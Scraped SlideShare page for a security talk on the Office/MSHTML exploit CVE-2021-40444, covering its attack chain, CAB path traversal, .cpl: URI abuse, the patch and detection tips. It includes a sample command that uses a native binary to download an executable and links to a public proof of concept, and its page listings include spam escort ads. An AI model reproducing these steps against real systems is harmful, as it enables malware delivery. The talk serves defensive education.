SlideShare a Scribd company logo
1 of 17
CVE 2021-40444
MSHTMHell
About Me
● Offensive security consultant at Kudelski Security
● Previous security consultant at Schneider Downs
● PAANG → 1-110th Infantry Battalion → Mt. Pleasant, PA
● Malware and threat intelligence “enthusiast”
● amartin@amartinsec.com / @amartinsec
“Typical” Office Phishing
● Payload as a macro
● NTLM Hash/Basic Authentication
Capture
CVE-2021-40444
● Users are taught to never enable macros from untrusted sources
● CVE-2021-40444 bypasses this by not using macros
● A user still has to enable editing for this exploit to work. While this still
requires user interaction, users aren't usually taught that this is a “bad thing”
Attack Chain
1. User opens document and enables editing
2. OLE (Object Linking and Embedding) in Word links to HTML file
using mhtml
3. Mshtml.dll renders the webpage through Internet Explorer Engine
4. Webpage contains some obfuscated JS that downloads a .cab file.
CAB file contains a .dll file with a .inf extension (setup information
file)
5. CAB file is extracted and .inf file is saved to the parent directory
due to a traversal vulnerability (ZipSlip discovered in 2018 by
Snyk)
6. Mshtml.dll executes .inf file using ActiveXObject via the .cpl: URI
scheme (control panel object) through control.exe. This causes
side-loading of the .inf (aka .dll) via rundll32.
a. This is a powerful undocumented “feature” of Internet Explorer
b. Other protocols can also be executed this was such as .doc,
.hta, etc.
7. Profit with a Cobalt Strike Beacon
The Payload Doc
● A Word document is a compressed document that can be unpacked to view
properties
● The Relationship file contains internal and external relationships unique to the
word document
● CVE-2021-40444 uses MSHTML (aka Trident) to download the webpage and
execute the ActiveX controls
LOLBINS
● Living Off The Land Binaries
● Built-in OS tools that allow us to perform malicious actions that look legitimate since we are
using native Window binaries such as download and execute
● Ex. excel.exe http://192.168.1.10/YouDontWantThis.exe → to download a file from the
command line
● https://lolbas-project.github.io/ → Windows
● https://gtfobins.github.io/ → Linux
LOLBINS Cont.
● CVE-2021-40444 uses control.exe to load a DLL into a Alternate Data Stream
(ADS)
● This (usually) drops Championship.inf to
C:UsersUserAppDataLocalTempchampionship.inf
● The ActiveX Object the attempts resolve the path to the .inf file
Deobfuscated HTML
● Padding is needed within the HTML file for execution → .cpl:123;
● The HTML file needs to be at least 4096 bytes to trigger (Will Dormann)
CAB File
● .cab (cabinet file) is a compression file that usually contains multiple files
● Most often seen in Windows updates (now it’s MSU’s)
● The .cab contains a malicious .DLL saved with the .INF extension
● Stored as ../championship.inf
● It is believed that the .inf is to throw off EDR detection instead of just having it
be a .dll
The two vulns that make CVE-2021-40444 possible
1. CAB Directory Traversal during extraction → ../championship.inf
2. File extensions as protocol → .cpl:DoSomeBadStuff.inf
Both are issues with MSHTML
In The Wild
● August 20 → Compilation date of CAB
malware sample
● September 1 → First identified by
@ShadowChasing1 on Twitter
● September 11 → public POC released to
GitHub by user lockedbyte. Builders quickly
started circulating malware forums
● September 14 → Microsoft releases patch
DEMO
https://github.com/lockedbyte/CVE-2021-40444
Expanding the Exploit
● Can be used in other Office formats such as .xlsx/.pptx and in .rtf files
● RTF’s will execute the payload in Explorer Preview Pane. A user doesn't even
have to open the file
● Before any patches were released, Microsoft recommended disabling untrusted
ActiveX in the environment. This was quickly bypassed by using .wsf: (Windows
Scripting Host File) that can contain VBScript and Jscript code
○ https://github.com/Edubr2020
● Can be delivered as a RAR to bypass “The mark of the web” for a true one click
exploit
Fix By Microsoft
● Patched the ../ directory traversal vulnerability
● Patched mshtml.dll to invalidate any URI with a “.” preceding it
○ This prevents .cpl: or other extensions from being treated as a protocol
Prevention
● Enable automatic Window updates
● Defender now detects any URI scheme that includes a period
● Any EDR should flag winword.exe that spawns a child process control.exe if
configured correctly
Side Note.
● Be cautious of what you send to cloud AV sandboxes: Ex. CWT / Ragnar Locker

More Related Content

Similar to MSHTMHell.pptx

On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andAlisa Esage Шевченко
 
Two-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryoneTwo-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryonePaul Melson
 
Dotnet Basics Presentation
Dotnet Basics PresentationDotnet Basics Presentation
Dotnet Basics PresentationSudhakar Sharma
 
Introduction to Software Build Technology
Introduction to Software Build TechnologyIntroduction to Software Build Technology
Introduction to Software Build TechnologyPhilip Johnson
 
Elsevier NESE - Spying on the Browser
Elsevier NESE - Spying on the BrowserElsevier NESE - Spying on the Browser
Elsevier NESE - Spying on the BrowserAditya K Sood
 
IoT: Contrasting Yocto/Buildroot to binary OSes
IoT: Contrasting Yocto/Buildroot to binary OSesIoT: Contrasting Yocto/Buildroot to binary OSes
IoT: Contrasting Yocto/Buildroot to binary OSesMender.io
 
Ppt project process migration
Ppt project process migrationPpt project process migration
Ppt project process migrationjaya380
 
Firefox security (prasanna)
Firefox security (prasanna) Firefox security (prasanna)
Firefox security (prasanna) ClubHack
 
Aleksandr Kutsan "Managing Dependencies in C++"
Aleksandr Kutsan "Managing Dependencies in C++"Aleksandr Kutsan "Managing Dependencies in C++"
Aleksandr Kutsan "Managing Dependencies in C++"LogeekNightUkraine
 
Event Driven programming(ch1 and ch2).pdf
Event Driven programming(ch1 and ch2).pdfEvent Driven programming(ch1 and ch2).pdf
Event Driven programming(ch1 and ch2).pdfAliEndris3
 
Esage on non-existent 0-days, stable binary exploits and user interaction
Esage   on non-existent 0-days, stable binary exploits and user interactionEsage   on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interactionDefconRussia
 
Addressing New Challenges in Software Protection for .NET
Addressing New Challenges in Software Protection for .NETAddressing New Challenges in Software Protection for .NET
Addressing New Challenges in Software Protection for .NETLicensingLive! - SafeNet
 
Magento Docker Setup.pdf
Magento Docker Setup.pdfMagento Docker Setup.pdf
Magento Docker Setup.pdfAbid Malik
 
C# Security Testing and Debugging
C# Security Testing and DebuggingC# Security Testing and Debugging
C# Security Testing and DebuggingRich Helton
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!Luca Carettoni
 
Remote control system (rcs)
Remote control system (rcs)Remote control system (rcs)
Remote control system (rcs)Mehedi Hasan
 
Loaders and Linkers
Loaders and LinkersLoaders and Linkers
Loaders and Linkerskunj desai
 

Similar to MSHTMHell.pptx (20)

On non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits andOn non existent 0-days, stable binary exploits and
On non existent 0-days, stable binary exploits and
 
PIC your malware
PIC your malwarePIC your malware
PIC your malware
 
Two-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for EveryoneTwo-For-One Talk: Malware Analysis for Everyone
Two-For-One Talk: Malware Analysis for Everyone
 
Dotnet Basics Presentation
Dotnet Basics PresentationDotnet Basics Presentation
Dotnet Basics Presentation
 
Introduction to Software Build Technology
Introduction to Software Build TechnologyIntroduction to Software Build Technology
Introduction to Software Build Technology
 
Elsevier NESE - Spying on the Browser
Elsevier NESE - Spying on the BrowserElsevier NESE - Spying on the Browser
Elsevier NESE - Spying on the Browser
 
IoT: Contrasting Yocto/Buildroot to binary OSes
IoT: Contrasting Yocto/Buildroot to binary OSesIoT: Contrasting Yocto/Buildroot to binary OSes
IoT: Contrasting Yocto/Buildroot to binary OSes
 
Ppt project process migration
Ppt project process migrationPpt project process migration
Ppt project process migration
 
Firefox security (prasanna)
Firefox security (prasanna) Firefox security (prasanna)
Firefox security (prasanna)
 
Aleksandr Kutsan "Managing Dependencies in C++"
Aleksandr Kutsan "Managing Dependencies in C++"Aleksandr Kutsan "Managing Dependencies in C++"
Aleksandr Kutsan "Managing Dependencies in C++"
 
Event Driven programming(ch1 and ch2).pdf
Event Driven programming(ch1 and ch2).pdfEvent Driven programming(ch1 and ch2).pdf
Event Driven programming(ch1 and ch2).pdf
 
Esage on non-existent 0-days, stable binary exploits and user interaction
Esage   on non-existent 0-days, stable binary exploits and user interactionEsage   on non-existent 0-days, stable binary exploits and user interaction
Esage on non-existent 0-days, stable binary exploits and user interaction
 
Addressing New Challenges in Software Protection for .NET
Addressing New Challenges in Software Protection for .NETAddressing New Challenges in Software Protection for .NET
Addressing New Challenges in Software Protection for .NET
 
Magento Docker Setup.pdf
Magento Docker Setup.pdfMagento Docker Setup.pdf
Magento Docker Setup.pdf
 
C# Security Testing and Debugging
C# Security Testing and DebuggingC# Security Testing and Debugging
C# Security Testing and Debugging
 
Angular meteor presentation
Angular meteor presentationAngular meteor presentation
Angular meteor presentation
 
The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!The old is new, again. CVE-2011-2461 is back!
The old is new, again. CVE-2011-2461 is back!
 
Remote control system (rcs)
Remote control system (rcs)Remote control system (rcs)
Remote control system (rcs)
 
Loaders and Linkers
Loaders and LinkersLoaders and Linkers
Loaders and Linkers
 
Firefox (in)Security
Firefox (in)SecurityFirefox (in)Security
Firefox (in)Security
 

Recently uploaded

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 

Recently uploaded (20)

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 

MSHTMHell.pptx

  • 2. About Me ● Offensive security consultant at Kudelski Security ● Previous security consultant at Schneider Downs ● PAANG → 1-110th Infantry Battalion → Mt. Pleasant, PA ● Malware and threat intelligence “enthusiast” ● amartin@amartinsec.com / @amartinsec
  • 3. “Typical” Office Phishing ● Payload as a macro ● NTLM Hash/Basic Authentication Capture
  • 4. CVE-2021-40444 ● Users are taught to never enable macros from untrusted sources ● CVE-2021-40444 bypasses this by not using macros ● A user still has to enable editing for this exploit to work. While this still requires user interaction, users aren't usually taught that this is a “bad thing”
  • 5. Attack Chain 1. User opens document and enables editing 2. OLE (Object Linking and Embedding) in Word links to HTML file using mhtml 3. Mshtml.dll renders the webpage through Internet Explorer Engine 4. Webpage contains some obfuscated JS that downloads a .cab file. CAB file contains a .dll file with a .inf extension (setup information file) 5. CAB file is extracted and .inf file is saved to the parent directory due to a traversal vulnerability (ZipSlip discovered in 2018 by Snyk) 6. Mshtml.dll executes .inf file using ActiveXObject via the .cpl: URI scheme (control panel object) through control.exe. This causes side-loading of the .inf (aka .dll) via rundll32. a. This is a powerful undocumented “feature” of Internet Explorer b. Other protocols can also be executed this was such as .doc, .hta, etc. 7. Profit with a Cobalt Strike Beacon
  • 6. The Payload Doc ● A Word document is a compressed document that can be unpacked to view properties ● The Relationship file contains internal and external relationships unique to the word document ● CVE-2021-40444 uses MSHTML (aka Trident) to download the webpage and execute the ActiveX controls
  • 7. LOLBINS ● Living Off The Land Binaries ● Built-in OS tools that allow us to perform malicious actions that look legitimate since we are using native Window binaries such as download and execute ● Ex. excel.exe http://192.168.1.10/YouDontWantThis.exe → to download a file from the command line ● https://lolbas-project.github.io/ → Windows ● https://gtfobins.github.io/ → Linux
  • 8. LOLBINS Cont. ● CVE-2021-40444 uses control.exe to load a DLL into a Alternate Data Stream (ADS) ● This (usually) drops Championship.inf to C:UsersUserAppDataLocalTempchampionship.inf ● The ActiveX Object the attempts resolve the path to the .inf file
  • 9. Deobfuscated HTML ● Padding is needed within the HTML file for execution → .cpl:123; ● The HTML file needs to be at least 4096 bytes to trigger (Will Dormann)
  • 10. CAB File ● .cab (cabinet file) is a compression file that usually contains multiple files ● Most often seen in Windows updates (now it’s MSU’s) ● The .cab contains a malicious .DLL saved with the .INF extension ● Stored as ../championship.inf ● It is believed that the .inf is to throw off EDR detection instead of just having it be a .dll
  • 11. The two vulns that make CVE-2021-40444 possible 1. CAB Directory Traversal during extraction → ../championship.inf 2. File extensions as protocol → .cpl:DoSomeBadStuff.inf Both are issues with MSHTML
  • 12. In The Wild ● August 20 → Compilation date of CAB malware sample ● September 1 → First identified by @ShadowChasing1 on Twitter ● September 11 → public POC released to GitHub by user lockedbyte. Builders quickly started circulating malware forums ● September 14 → Microsoft releases patch
  • 14. Expanding the Exploit ● Can be used in other Office formats such as .xlsx/.pptx and in .rtf files ● RTF’s will execute the payload in Explorer Preview Pane. A user doesn't even have to open the file ● Before any patches were released, Microsoft recommended disabling untrusted ActiveX in the environment. This was quickly bypassed by using .wsf: (Windows Scripting Host File) that can contain VBScript and Jscript code ○ https://github.com/Edubr2020 ● Can be delivered as a RAR to bypass “The mark of the web” for a true one click exploit
  • 15. Fix By Microsoft ● Patched the ../ directory traversal vulnerability ● Patched mshtml.dll to invalidate any URI with a “.” preceding it ○ This prevents .cpl: or other extensions from being treated as a protocol
  • 16. Prevention ● Enable automatic Window updates ● Defender now detects any URI scheme that includes a period ● Any EDR should flag winword.exe that spawns a child process control.exe if configured correctly
  • 17. Side Note. ● Be cautious of what you send to cloud AV sandboxes: Ex. CWT / Ragnar Locker